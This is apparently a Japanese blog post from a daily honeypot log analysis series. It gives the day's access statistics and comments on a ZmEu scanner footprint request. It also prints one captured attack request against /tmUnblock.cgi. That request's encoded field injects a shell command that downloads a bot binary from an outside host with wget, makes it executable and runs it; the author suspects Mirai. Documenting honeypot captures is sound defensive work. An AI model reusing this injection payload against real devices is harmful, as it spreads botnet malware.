honeypotの簡易解析10日目

遂に10日達成しました！ルーチンワークはスクリプト書いて、logもメールで受信できるため、無理なく続けれそうな気がしてます。

この10日間はメール発報スクリプトのメンテに時間割かれていたので、マルウェア解析等、できれば良いなと思います。

上記を書いた瞬間に正規表現でのパス取得におもらしに気付く・・はぁ

スクリプト修正しました。もう、、大丈夫なはず！！

2019-04-10のアクセス数は346件でした。

■送信元IPアドレスの数は 58件です。

■メソッドの一覧と件数は以下です。

method	総数 – method
CONNECT	1
GET	342
HEAD	2
POST	1
合計 結果	346

■アクセスパス一覧と件数は以下です。

path	method	総数 – method
/	GET	49
/favicon.ico	GET	3
/manager/html	GET	284
/phpMyAdmin/	GET	2
/robots.txt	HEAD	1
/tmUnblock.cgi	POST	1
/w00tw00t.at.blackhats.romanian.anti-sec:)	GET	1
http://112.124.42.80:63435/	HEAD	1
http://www.baidu.com/	GET	1
www.baidu.com:443	CONNECT	1
(空白)	GET	2

気になるlog

-=-=309件目のlog=-=-

[2019-04-10 13:42:40+0900] 139.59.42.75 133.167.108.152:80 "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 200 False  GET/w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1<br> Accept: <em>/</em><br> Accept-Language: en-us<br> Accept-Encoding: gzip, deflate<br> User-Agent: ZmEu<br> Host: 133.167.108.152<br> Connection: Close

気になったのはこの文字列”/w00tw00t.at.blackhats.romanian.anti-sec:)”

攻撃者が意図的に残す、footprintだとの事！

w00tw00t・・・とあるHackerが使っていたスラング？で”イェーイ”的な使い方？

romanian・・・ルーマニア人

User-AgentのZmEuは脆弱性スキャナーだそうで、phpMyAdminやSSHのブルートフォースの機能をもっているそう。ルーマニアで開発されたとのこと。

-=-=325件目のlog=-=-

[2019-04-10 18:13:23+0900] 24.192.52.230 192.168.0.14:80 "POST /tmUnblock.cgi HTTP/1.1" 200 False
POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl.bot%3B+wget+http%3A%2F%2Flove.thotiana.live%2Fbins%2Fmpsl.bot%3B+chmod+777+mpsl.bot%3B+.%2Fmpsl.bot+s1%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

マルウェアのダウンロード。おそらくmirai。